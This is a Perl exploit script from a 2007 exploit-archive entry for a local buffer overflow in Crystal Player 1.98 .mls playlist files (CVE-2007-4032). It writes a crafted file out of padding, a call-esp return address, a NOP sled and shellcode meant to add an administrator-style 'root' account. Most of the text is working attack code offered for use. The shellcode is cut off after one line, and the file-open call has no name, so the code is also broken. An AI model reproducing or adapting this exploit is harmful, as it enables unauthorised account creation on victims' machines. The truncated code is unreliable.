CrystalPlayer 1.98 - '.mls' Local Buffer Overflow

Related Vulnerabilities: CVE-2007-4032  
Publish Date: 26 Jul 2007

#Crystal Player 1.98
#Playlist(.mls) File Local Buffer Overflow Exploit
#Credit To Timq For The Vulnerability
#POC By Arham Muhammad

#While Debugging EIP And EBP Successfully Gets Overwritten!
#Upon Successful Exploitation, DOS Occurs And It Further Destorys The Libraries,Upon Successful Exploitation
#When The Next Time App Is Executed
#It Throws Microsfot Visual C++ Runtime Library Error Followed By An Other Exception
#The POC Add user "root" with password "root" to the os!
#Tested On x86 vista enterprise ed.
#Might require Changing esp address coz of os and sp change

print "Crystal Player 1.98 Local Bufferoverflow Exploit\n";
print "Creating Crafted .mls File\n";

$buff = 'A' x 1033;

$ret = "\x76\xF5\x48\x37"; #call esp in ntdll.dll

# win32_adduser - PASS=root EXITFUNC=seh USER=root Size=232 Encoder=PexFnstenvSub
$shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xea". #Add user root with pass root 232 bytes

$nopsled = "\x90" x 797; #Nopsled to fill the buffer

open(mls, ">./");
print mls "$buff";
print mls "$ret";
print mls "$nopsled";
print mls "$shellcode";

print "Crafted File Created!\n";

#Arham Muhammad

#Greets:: str0ke,Hackman,tushy,And All My Friends, Specially AmBi(Love Ya!!!);

# [2007-07-26]